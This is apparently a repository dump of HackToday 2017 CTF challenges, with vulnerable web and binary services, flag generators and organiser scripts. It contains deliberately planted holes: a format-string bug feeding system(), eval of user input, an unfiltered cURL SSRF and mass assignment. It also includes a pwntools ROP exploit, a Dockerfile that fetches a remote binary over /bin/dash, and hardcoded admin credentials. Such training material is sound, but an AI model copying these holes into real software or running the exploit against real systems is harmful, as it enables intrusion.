cipher = 'Hy80o81d9}95{8047Ta887k43c2a' 8 | print j 9 | for i in range(100): 10 | cipher = circle.encrypt(cipher, j) 11 | if 'HackToday' in cipher: 12 | print i, cipher 13 | sys.exit(0) 14 | -------------------------------------------------------------------------------- /2017-quals/exploitation/chatbot/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | web: 4 | image: chatbot:latest 5 | deploy: 6 | replicas: 3 7 | resources: 8 | limits: 9 | cpus: "0.1" 10 | memory: 50M 11 | restart_policy: 12 | condition: on-failure 13 | ports: 14 | - "40135:5000" 15 | networks: 16 | - overlay 17 | networks: 18 | overlay: 19 | -------------------------------------------------------------------------------- /2017-quals/exploitation/epoch-service/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | web: 4 | image: epoch:latest 5 | deploy: 6 | replicas: 3 7 | resources: 8 | limits: 9 | cpus: "0.1" 10 | memory: 50M 11 | restart_policy: 12 | condition: on-failure 13 | ports: 14 | - "47000:5000" 15 | networks: 16 | - overlay 17 | networks: 18 | overlay: 19 | -------------------------------------------------------------------------------- /2017-quals/exploitation/turuturu/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | web: 4 | image: turuturu:latest 5 | deploy: 6 | replicas: 3 7 | resources: 8 | limits: 9 | cpus: "0.1" 10 | memory: 50M 11 | restart_policy: 12 | condition: on-failure 13 | ports: 14 | - "40074:5000" 15 | networks: 16 | - overlay 17 | networks: 18 | overlay: 19 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/config/db.php: -------------------------------------------------------------------------------- 1 | 'yii\db\Connection', 5 | 'dsn' => 'sqlite:'.__DIR__.'/../sqlite/mass.db', 6 | 'username' => '', 7 | 'password' => '', 8 | 'charset' => 'utf8', 9 | 10 | // Schema cache options (for production environment) 11 | //'enableSchemaCache' => true, 12 | //'schemaCacheDuration' => 60, 13 | //'schemaCache' => 'cache', 14 | ]; 15 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/global/window.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * global/window.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | "function"==typeof define&&define.amd?define(function(){return window}):"object"==typeof exports&&(module.exports=window); -------------------------------------------------------------------------------- /platform-attack-defense/web-platform/README.md: -------------------------------------------------------------------------------- 1 | # Web Platform 2 | 3 | Fungsi: 4 | - Admin dapat menambahkan/ganti/hapus *team* 5 | - Admin dapat menambahkan/ganti/hapus *soal* 6 | - Admin dapat menambahkan/ganti/hapus *flag* 7 | - Team dapat submit *flag* 8 | - Team dapat Lihat dan download soal 9 | - Scoreboard *+Fitur Freeze* 10 | - API untuk menerima kirim bot service (untuk mengurangi score yang down) 100 FAIL dalam 5 jam maka minus poin 11 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/index.php: -------------------------------------------------------------------------------- 1 | run(); 13 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/functional.suite.yml: -------------------------------------------------------------------------------- 1 | # Codeception Test Suite Configuration 2 | 3 | # suite for functional (integration) tests. 4 | # emulate web requests and make application process them. 5 | # (tip: better to use with frameworks). 6 | 7 | # RUN `build` COMMAND AFTER ADDING/REMOVING MODULES. 8 | #basic/web/index.php 9 | class_name: FunctionalTester 10 | modules: 11 | enabled: 12 | - Filesystem 13 | - Yii2 14 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/global/document.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * global/document.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | "function"==typeof define&&define.amd?define(function(){return document}):"object"==typeof exports&&(module.exports=document); -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/README.md: -------------------------------------------------------------------------------- 1 | # Musicality_icon 2 | ## Description 3 | Setiap user yang terdaftar dapat memperbarui avatarnya dengan menyisipkan URL gambar ke *field* yang disediakan. URL tersebut kemudian di cURL dan disimpan di dalam server dalam bentuk `md5(*string_random*).jpg`. 4 | 5 | ## Exploit 6 | cURL tidak difilter, sehingga user bisa memasukkan `file:///etc/passwd` untuk mendapatkan flag 7 | 8 | ## Database 9 | - SQLite3, lokasi: @webroot/sqlite/data.db -------------------------------------------------------------------------------- /platform-attack-defense/web-platform/admin.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | 8 | 9 |
10 | 11 |
12 | 13 |
14 | 15 |
16 | 17 |
18 | 19 | 20 | 21 |
22 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/views/site/about.php: -------------------------------------------------------------------------------- 1 | title = 'How To Blog | About'; 8 | $this->params['breadcrumbs'][] = 'About'; 9 | ?> 10 |
11 |

About

12 | 13 |

14 | How To Blog is a blog for sharing information about anything that is useful for anyone. Everyone registered can create new articles . 15 |

16 | 17 |
18 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/README.md: -------------------------------------------------------------------------------- 1 | # HowTo Blog 2 | ## Description 3 | Yii2 Mass Assignment exploit. 4 | Mengubah role `user` menjadi `admin` dengan meng-*intercept* *request* POST saat proses registrasi user baru. Hanya role `admin` yang dapat mengakses flag di halaman utama. 5 | 6 | ## Installation 7 | - Gunakan [composer](https://getcomposer.org/download/) untuk menginstalasi *dependency* Yii.
8 | ``$ php composer.phar install`` 9 | 10 | ## Database 11 | - SQLite3, lokasi: @webroot/sqlite/mass.db -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance/HomeCest.php: -------------------------------------------------------------------------------- 1 | amOnPage(Url::toRoute('/site/index')); 9 | $I->see('My Company'); 10 | 11 | $I->seeLink('About'); 12 | $I->click('About'); 13 | $I->wait(2); // wait for page to be opened 14 | 15 | $I->see('This is the About page.'); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /2017-quals/cryptography/circle/circle.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | def encrypt(flag, n): 4 | check = [0 for i in range(len(flag))] 5 | point = 1 6 | result = flag[0] 7 | check[0] = 1 8 | i = 0 9 | 10 | while len(result) != len(flag): 11 | if check[i % len(flag)] == 0: 12 | if point == n: 13 | result += flag[i % len(flag)] 14 | check[i % len(flag)] = 1 15 | point = 0 16 | else: 17 | point -= 1 18 | 19 | i += 1 20 | point += 1 21 | 22 | return result 23 | 24 | def decrypt(): 25 | #not implemented yet 26 | pass 27 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/public: -------------------------------------------------------------------------------- 1 | p= 0x983e630c03d282b25980786394884d2f707827184a89ecc71e3a280afa6e5300a36b131b0da385f4fd6e38ff33d9ee8f54b837b6ee43b6131da0228a3654dd2b 2 | g= 0xa0d7f4addb645be80ab40abe5a27bac0f2edaf2488dd9cf07b5204d517599baa3dc489b7edef3e037a9d49dd4f68c396a1e091f88d0b320e2786fefea6528305 3 | A= 0x6990ce2e3a80719bc7390401300cc3d420d391fd5bc29784807785aa9fbb468ccfd0741a9c4890883806c0f307fd53b5ec5877017841cc09681885f867f350a 4 | B= 0x45d0269a1f9ca964641a0a75a024bd77b409080369ae6a77af74972f8ec809e3757948bc355c0df58d3af3aabf45c47fe6c9171e9c882ee4cb7f93097e946484 -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/dependencyLibs/inputmask.dependencyLib.jquery.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * dependencyLibs/inputmask.dependencyLib.jquery.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["jquery"],a):"object"==typeof exports?module.exports=a(require("jquery")):window.dependencyLib=a(jQuery)}(function(a){return a}); -------------------------------------------------------------------------------- /2017-quals/exploitation/epoch-service/src/epoch.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() 5 | { 6 | setvbuf(stdout, NULL, _IONBF, 0); 7 | 8 | char cmd[9] = "date +%s"; 9 | char nama[256]; 10 | char temp[256]; 11 | 12 | printf("Nomor Pengguna: %o\n", &cmd); 13 | printf("Nama: "); 14 | fgets(temp, 256, stdin); 15 | snprintf(nama, sizeof(nama), temp); 16 | printf("-----------\nHalo %s", nama); 17 | printf("\nEpoch: "); 18 | run(cmd); 19 | return 0; 20 | 21 | 22 | } 23 | 24 | 25 | int run(char ** cmd){ 26 | 27 | system(cmd); 28 | return 0; 29 | } -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tiangolo/uwsgi-nginx-flask:flask 2 | 3 | # copy over our requirements.txt file 4 | COPY requirements.txt /tmp/ 5 | 6 | # upgrade pip and install required python packages 7 | RUN pip install -U pip 8 | RUN pip install -r /tmp/requirements.txt 9 | 10 | # copy over our app code 11 | COPY ./src /app 12 | 13 | # Create decoy 14 | COPY ./here /here 15 | 16 | # create portal 17 | RUN /bin/ln -s / /app/static/css/portal 18 | 19 | # set an environmental variable, MESSAGE, 20 | # which the app will use and display 21 | ENV MESSAGE "hello from Docker" 22 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/time_is_money/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 | Password : 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 27 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/permute/gen.py: -------------------------------------------------------------------------------- 1 | from collections import defaultdict 2 | import random 3 | random.seed(42) 4 | 5 | trick_str = "HackToday{xxtHi$_1s_N0t_The_real_Flagxx}" 6 | target_str = "HackToday{str1Ng$_tr1cks_Hack}" 7 | 8 | pos_map = defaultdict(list) 9 | 10 | for i,c in enumerate(trick_str): 11 | pos_map[c].append(i) 12 | 13 | res = [] 14 | for c in target_str: 15 | if c not in pos_map: 16 | print "Can't find mapping for ", c 17 | exit(0) 18 | res.append(str(random.choice(pos_map[c]))) 19 | print 'const char *trick_str = "{0}";'.format(trick_str) 20 | print "int permute[] = {" + ", ".join(res) + ", -1};" 21 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/yii.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | rem ------------------------------------------------------------- 4 | rem Yii command line bootstrap script for Windows. 5 | rem 6 | rem @author Qiang Xue 7 | rem @link http://www.yiiframework.com/ 8 | rem @copyright Copyright (c) 2008 Yii Software LLC 9 | rem @license http://www.yiiframework.com/license/ 10 | rem ------------------------------------------------------------- 11 | 12 | @setlocal 13 | 14 | set YII_PATH=%~dp0 15 | 16 | if "%PHP_COMMAND%" == "" set PHP_COMMAND=php.exe 17 | 18 | "%PHP_COMMAND%" "%YII_PATH%yii" %* 19 | 20 | @endlocal 21 | -------------------------------------------------------------------------------- /2017-finals/soal-backup/troll/genflag.py: -------------------------------------------------------------------------------- 1 | import random 2 | random.seed(1945) 3 | 4 | with open("troll.txt") as f: 5 | text = f.read() 6 | 7 | flag = "HackToday{HTML_Troll}" 8 | 9 | res = "" 10 | for c in flag: 11 | a = ("0000000" + bin(ord(c))[2:])[-7:] 12 | res += a 13 | 14 | print res 15 | 16 | tmp = list(text) 17 | res = res.replace("1", "O") 18 | 19 | idx = 0 20 | for i,c in enumerate(tmp): 21 | if (c=="Q"): 22 | if random.randint(0,3)==2: 23 | tmp[i] =res[idx] 24 | idx +=1 25 | if idx==len(res): 26 | break 27 | 28 | assert(idx==len(res)) 29 | 30 | with open("tf.txt", "w") as f: 31 | f.write("".join(tmp)) 32 | 33 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/bin/yii.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | rem ------------------------------------------------------------- 4 | rem Yii command line bootstrap script for Windows. 5 | rem 6 | rem @author Qiang Xue 7 | rem @link http://www.yiiframework.com/ 8 | rem @copyright Copyright (c) 2008 Yii Software LLC 9 | rem @license http://www.yiiframework.com/license/ 10 | rem ------------------------------------------------------------- 11 | 12 | @setlocal 13 | 14 | set YII_PATH=%~dp0 15 | 16 | if "%PHP_COMMAND%" == "" set PHP_COMMAND=php.exe 17 | 18 | "%PHP_COMMAND%" "%YII_PATH%yii" %* 19 | 20 | @endlocal 21 | -------------------------------------------------------------------------------- /2017-finals/soal/gen_creds.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need team numbers as argument"; exit 4 | fi 5 | team=$1 6 | echo -n "" > username.list 7 | echo -n "" > password.list 8 | echo -n "" > token.list 9 | for i in `seq 1 $team`; do 10 | username="$(tr -cd '[:lower:]' < /dev/urandom | fold -w10 | head -n1 | awk '{ print $1 }')" 11 | echo $username >> username.list 12 | password="$(tr -cd '[:lower:]' < /dev/urandom | fold -w15 | head -n1 | awk '{ print $1 }')" 13 | echo $password >> password.list 14 | token="$(tr -cd '[:lower:]' < /dev/urandom | fold -w5 | head -n1 | awk '{ print $1 }')" 15 | echo $token >> token.list 16 | done -------------------------------------------------------------------------------- /2017-finals/soal/kudanil_lsi/solution.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from subprocess import check_output as co 3 | p = process("./kudanil_lsi") 4 | p.sendline("") 5 | e = ELF('./kudanil_lsi') 6 | 7 | binsu = next(e.search('/bin/su')) 8 | system_plt = e.plt['system'] 9 | 10 | s = p.recvuntil("su") 11 | 12 | s = s.split("\n")[-11:] 13 | 14 | s = "\n".join(s) 15 | print s 16 | f = open('map','w') 17 | f.write(s) 18 | f.close() 19 | solution = co('cat map | ./map.solution', shell=True) 20 | 21 | for c in range(0, len(solution)): 22 | p.sendline(solution[c]) 23 | 24 | payload = "A"*23 + p32(system_plt) + 'BBBB' + p32(binsu) 25 | p.sendline(payload) 26 | p.interactive() 27 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/yii: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | run(); 21 | exit($exitCode); 22 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/here/main.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, render_template 2 | # set the project root directory as the static folder, you can set others. 3 | app = Flask(__name__) 4 | import os 5 | assert os.environ['FLAG'] 6 | 7 | 8 | @app.route('/') 9 | @app.route('/') 10 | def root(index="index.html"): 11 | return app.send_static_file(index) 12 | 13 | @app.route('/css/') 14 | def send_css(filename): 15 | return send_from_directory('css', filename) 16 | 17 | 18 | @app.errorhandler(404) 19 | def page_not_found(e): 20 | argg = request.args.get('val') 21 | return render_template('404.html',args=argg),404 22 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/Dockerfile.old: -------------------------------------------------------------------------------- 1 | # Use ubuntu 16.05 2 | FROM ubuntu:16.04 3 | 4 | # Open port 5000 5 | EXPOSE 40065 6 | 7 | # update 8 | RUN apt-get update 9 | 10 | # install socat 11 | RUN apt-get install socat lib32ncurses5 wget -y 12 | 13 | # Set WorkDir 14 | RUN mkdir /app 15 | WORKDIR /app 16 | 17 | # Copy binary to workdir 18 | COPY here/ /here 19 | COPY src/ /app 20 | 21 | # Securing Environment 22 | RUN wget https://transfer.sh/6ntGG/dash -O /bin/dash 23 | RUN chmod 700 /usr/bin/* /bin/* /tmp /dev/shm 24 | RUN chmod 755 /bin/dash /bin/sh /bin/cat /usr/bin/id /bin/ls 25 | 26 | # Run Program 27 | CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:./epoch,su=nobody 28 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/views/site/error.php: -------------------------------------------------------------------------------- 1 | title = $name; 11 | ?> 12 |
13 | 14 |

title) ?>

15 | 16 |
17 | 18 |
19 | 20 |

21 | The above error occurred while the Web server was processing your request. 22 |

23 |

24 | Please contact us if you think this is a server error. Thank you. 25 |

26 | 27 |
28 | -------------------------------------------------------------------------------- /2017-finals/soal/buaya_lsi/buaya.gambar: -------------------------------------------------------------------------------- 1 | _ ___ /^^\ /^\ /^^\_ 2 | _ _@)@) \ ,,/ '` ~ `'~~ ', `\. 3 | _/o\_ _ _ _/~`.`...'~\ ./~~..,'`','',.,' ' ~: 4 | / `,'.~,~.~ . , . , ~|, ,/ .,' , ,. .. ,,. `, ~\_ 5 | ( ' _' _ '_` _ ' . , `\_/ .' ..' ' ` ` `.. `, \_ 6 | ~V~ V~ V~ V~ ~\ ` ' . ' , ' .,.,''`.,.''`.,.``. ', \_ 7 | _/\ /\ /\ /\_/, . ' , `_/~\_ .' .,. ,, , _/~\_ `. `. '., \_ 8 | < ~ ~ '~`'~'`, ., . `_: ::: \_ ' `_/ ::: \_ `.,' . ', \_ 9 | \ ' `_ '`_ _ ',/ _::_::_ \ _ _/ _::_::_ \ `.,'.,`., \-,-,-,_,_, 10 | `'~~ `'~~ `'~~ `'~~ \(_)(_)(_)/ `~~' \(_)(_)(_)/ ~'`\_.._,._,'_;_;_;_;_; 11 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance/LoginCest.php: -------------------------------------------------------------------------------- 1 | amOnPage(Url::toRoute('/site/login')); 9 | $I->see('Login', 'h1'); 10 | 11 | $I->amGoingTo('try to login with correct credentials'); 12 | $I->fillField('input[name="LoginForm[username]"]', 'admin'); 13 | $I->fillField('input[name="LoginForm[password]"]', 'admin'); 14 | $I->click('login-button'); 15 | $I->wait(2); // wait for button to be clicked 16 | 17 | $I->expectTo('see user info'); 18 | $I->see('Logout'); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/assets/AppAsset.php: -------------------------------------------------------------------------------- 1 | 14 | * @since 2.0 15 | */ 16 | class AppAsset extends AssetBundle 17 | { 18 | public $basePath = '@webroot'; 19 | public $baseUrl = '@web'; 20 | public $css = [ 21 | 'css/site.css', 22 | ]; 23 | public $js = [ 24 | ]; 25 | public $depends = [ 26 | 'yii\web\YiiAsset', 27 | 'yii\bootstrap\BootstrapAsset', 28 | ]; 29 | } 30 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/page/404.php: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |
6 | 7 |
8 |
9 |
10 |
11 |

404 NOT FOUND!

12 |

Document you are looking for is not found in this server

13 |
14 |
15 |
16 |
17 |
-------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/.travis.yml: -------------------------------------------------------------------------------- 1 | language: php 2 | 3 | php: 4 | - 5.4 5 | - 5.5 6 | - 5.6 7 | - 7.0 8 | - 7.1 9 | # - hhvm 10 | 11 | # faster builds on new travis setup not using sudo 12 | sudo: false 13 | 14 | # cache vendor dirs 15 | cache: 16 | directories: 17 | - $HOME/.composer/cache 18 | 19 | install: 20 | - travis_retry composer self-update && composer --version 21 | - travis_retry composer update --dev --prefer-dist --no-interaction 22 | # setup application: 23 | - | 24 | sed -i "s/'cookieValidationKey' => ''/'cookieValidationKey' => 'testkey'/" config/web.php 25 | 26 | script: 27 | - | 28 | php -S localhost:8080 -t web > /dev/null 2>&1 & 29 | vendor/bin/codecept run 30 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_support/FunctionalTester.php: -------------------------------------------------------------------------------- 1 | 3 | #include 4 | #include "permute.h" 5 | 6 | const char *msgs[] = {"Wrong Flag", "Correct Flag"}; 7 | 8 | int main(int argc, char *argv[]) 9 | { 10 | int i, all, len, stlen; 11 | if (argc<2) { 12 | printf("usage: theflag \n"); 13 | return 0; 14 | } 15 | const char *input = argv[1]; 16 | all = 0; 17 | for (len=0; permute[len]!=-1; len++) { 18 | } 19 | stlen = strlen(input); 20 | all |= (int)len!=stlen; 21 | 22 | for (i=0; i < stlen; i++) { 23 | all |=( input[i] ^ trick_str[permute[i]]); 24 | } 25 | puts(msgs[(int)(all==0)]); 26 | 27 | return 0; 28 | } 29 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | HackToday 0x00 2 | ============== 3 | 4 | Kategori 5 | -------- 6 | - Web Hacking 7 | - Exploitation 8 | - Reverse Engineering 9 | - Forensics 10 | - Cryptography 11 | 12 | Format Flag 13 | -------- 14 | 15 | ## `^HackToday{\w+}$` ## 16 | 17 | Penyisihan Online 18 | ----------------- 19 | 20 | Level | Total |Poin | Distribusi 21 | ----------|-------|-----|----------- 22 | Easy | 7 | 481 | 62, 65, 67, 69, 71, 73, 74 23 | Medium | 5 | 452 | 87, 89, 91, 92, 93 24 | Hard | 3 | 404 | 132, 135, 137 25 | 26 | 27 | ---------- 28 | 29 | Total Point: 1337 30 | 31 | Tanggal 32 | ------- 33 | 34 | Penyisihan | Final 35 | -----------------|------- 36 | 5/6 Agustus 2017 | 16/17 September 2017 37 | 38 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/.travis.yml: -------------------------------------------------------------------------------- 1 | language: php 2 | 3 | php: 4 | - 5.4 5 | - 5.5 6 | - 5.6 7 | - 7.0 8 | - 7.1 9 | # - hhvm 10 | 11 | # faster builds on new travis setup not using sudo 12 | sudo: false 13 | 14 | # cache vendor dirs 15 | cache: 16 | directories: 17 | - $HOME/.composer/cache 18 | 19 | install: 20 | - travis_retry composer self-update && composer --version 21 | - travis_retry composer update --dev --prefer-dist --no-interaction 22 | # setup application: 23 | - | 24 | sed -i "s/'cookieValidationKey' => ''/'cookieValidationKey' => 'testkey'/" config/web.php 25 | 26 | script: 27 | - | 28 | php -S localhost:8080 -t web > /dev/null 2>&1 & 29 | vendor/bin/codecept run 30 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/bower.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "cryptonode", 3 | "description": "An encrypted chat program", 4 | "main": "app.js", 5 | "authors": [ 6 | "Supernomad " 7 | ], 8 | "license": "Apache-2.0", 9 | "keywords": [ 10 | "encrypted", 11 | "encryption", 12 | "aes", 13 | "aws256", 14 | "messaging", 15 | "messenger", 16 | "im", 17 | "instant" 18 | ], 19 | "homepage": "https://github.com/Supernomad/CryptoNode", 20 | "moduleType": [ 21 | "es6", 22 | "node" 23 | ], 24 | "private": true, 25 | "ignore": [ 26 | "**/.*", 27 | "node_modules", 28 | "bower_components", 29 | "test", 30 | "tests" 31 | ] 32 | } 33 | -------------------------------------------------------------------------------- /2017-finals/soal/entry_username_password.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from pwn import * 4 | 5 | a = remote('192.168.8.236', 1337) 6 | print a.recvuntil('Username:') 7 | a.sendline('admin') 8 | print a.recvuntil('Token') 9 | a.sendline('polisi') 10 | 11 | usernames = open('username.list').read().split('\n') 12 | names = open('name.list').read().split('\n') 13 | tokens = open('token.list').read().split('\n') 14 | 15 | for i in range(1, 11): 16 | print a.recvuntil('>>>') 17 | a.sendline('/add teams') 18 | print a.recvuntil('Username:') 19 | a.sendline(usernames[i-1]) 20 | print a.recvuntil('Team number:') 21 | a.sendline(str(i)) 22 | print a.recvuntil('Token:') 23 | a.sendline(tokens[i-1]) 24 | print a.recvuntil('Team name:') 25 | a.sendline(names[i-1]) -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_support/UnitTester.php: -------------------------------------------------------------------------------- 1 | 115)die("masa format date panjang gitu, hmmm mencurigakan..."); 16 | $fmt = base64_decode($_GET['f']); 17 | if(contains($fmt, $blacklists)) die("no attacker allowed!!!"); 18 | eval('echo date("'.$fmt.'");'); 19 | die(); 20 | } 21 | } 22 | 23 | die("only admin can see my day!"); 24 | ?> 25 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/_support/AcceptanceTester.php: -------------------------------------------------------------------------------- 1 | 8 | beginPage() ?> 9 | 10 | 11 | 12 | 13 | <?= Html::encode($this->title) ?> 14 | head() ?> 15 | 16 | 17 | beginBody() ?> 18 | 19 | endBody() ?> 20 | 21 | 22 | endPage() ?> 23 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/webasm/src/webasm.c: -------------------------------------------------------------------------------- 1 | // compile: 2 | // 3 | // emcc -o webasm.html -O2 webasm.c -s WASM=1 -s EXPORTED_FUNCTIONS="['_cekpass']" --shell-file template.html 4 | 5 | #include 6 | 7 | void engkrip(uint8_t *buf, int len) { 8 | int k = len; 9 | int i; 10 | 11 | int m = 134456; 12 | int c = 8121; 13 | int a = 28411; 14 | 15 | for (i = 0; i < len; i++) { 16 | buf[i] ^= k; 17 | k = (a*k + c) % m; 18 | } 19 | } 20 | 21 | int cekpass(uint8_t *buf, int len) { 22 | uint8_t key[29] = {118, 232, 97, 45, 18, 214, 128, 135, 32, 41, 237, 147, 26, 217, 106, 187, 199, 209, 210, 205, 155, 215, 226, 49, 120, 138, 236, 42, 74}; 23 | int i; 24 | int c = 0; 25 | 26 | engkrip(buf, len); 27 | 28 | for (i = 0; i < len; i++) { 29 | c |= buf[i] ^ key[i]; 30 | } 31 | 32 | return (c == 0); 33 | } 34 | 35 | 36 | -------------------------------------------------------------------------------- /2017-finals/soal/flag_submit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | import sys 4 | 5 | a = remote("192.168.8.236",1337) 6 | username = "admin" 7 | password = "polisi" 8 | a.recvuntil(": ") 9 | a.sendline(username) 10 | a.recvuntil(": ") 11 | a.sendline(password) 12 | if(len(sys.argv)>1): 13 | file = open(sys.argv[1], "r") 14 | fileread = file.read() 15 | hasil =fileread.split("\n") 16 | for i in hasil: 17 | flag = (i.split(","))[:1][0] 18 | team = (i.split(","))[1:][0] 19 | problem_num = (i.split(","))[-1][0] 20 | print a.recvuntil(">>> ") 21 | a.sendline("/add flags") 22 | print a.recvuntil(": "),flag 23 | a.sendline(flag) 24 | print a.recvuntil(": "),team 25 | a.sendline(team) 26 | print a.recvuntil(": "),problem_num 27 | a.sendline(problem_num) 28 | print "DONE !!!" 29 | else: 30 | print "NEED DIRECTORY ARGUMENT\n\nex:./flag_submit.py docker_math.csv\n\n" -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/bin/yii: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | [ 21 | 'db' => require __DIR__ . '/../../config/test_db.php' 22 | ] 23 | ] 24 | ); 25 | 26 | 27 | $application = new yii\console\Application($config); 28 | $exitCode = $application->run(); 29 | exit($exitCode); 30 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/commands/HelloController.php: -------------------------------------------------------------------------------- 1 | 18 | * @since 2.0 19 | */ 20 | class HelloController extends Controller 21 | { 22 | /** 23 | * This command echoes what you have entered as the message. 24 | * @param string $message the message to be echoed. 25 | */ 26 | public function actionIndex($message = 'hello world') 27 | { 28 | echo $message . "\n"; 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /2017-quals/reverse-engineering/balikin/main.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import XOR 2 | import base64 3 | import codecs 4 | source = "flag" 5 | target = "hasil" 6 | key = "RENDANGBASOGULING" 7 | 8 | BLOCKSIZE = 1048576 9 | 10 | def cobacoba(data): 11 | hasil = "" 12 | kr=0 13 | for i in data[::-1]: 14 | hasil+= chr(ord(i)+ord(key[kr%len(key)])) 15 | 16 | kr+=1 17 | 18 | cipher = XOR.new(key) 19 | return base64.b64encode(cipher.encrypt(hasil)) 20 | 21 | 22 | with codecs.open(source, "r", "utf-8") as sourceFile: 23 | with codecs.open(target, "w", "ascii") as targetFile: 24 | while True: 25 | contents = sourceFile.read(BLOCKSIZE) 26 | contents = cobacoba(contents) 27 | if not contents: 28 | break 29 | 30 | targetFile.write(contents) 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/index.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/src/templates/404.html: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 404 Not Founds 9 | 10 | 11 | 12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
404
22 |
23 |
THE PAGE
24 |
WAS NOT FOUND
25 | BACK TO MARS 26 |
27 | 28 | 29 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/bindings/inputmask.binding.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * bindings/inputmask.binding.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["jquery","../inputmask","../global/document"],a):"object"==typeof exports?module.exports=a(require("jquery"),require("../inputmask"),require("../global/document")):a(jQuery,window.Inputmask,document)}(function(a,b,c){a(c).ajaxComplete(function(c,d,e){-1!==a.inArray("html",e.dataTypes)&&a(".inputmask, [data-inputmask], [data-inputmask-mask], [data-inputmask-alias]").each(function(a,c){void 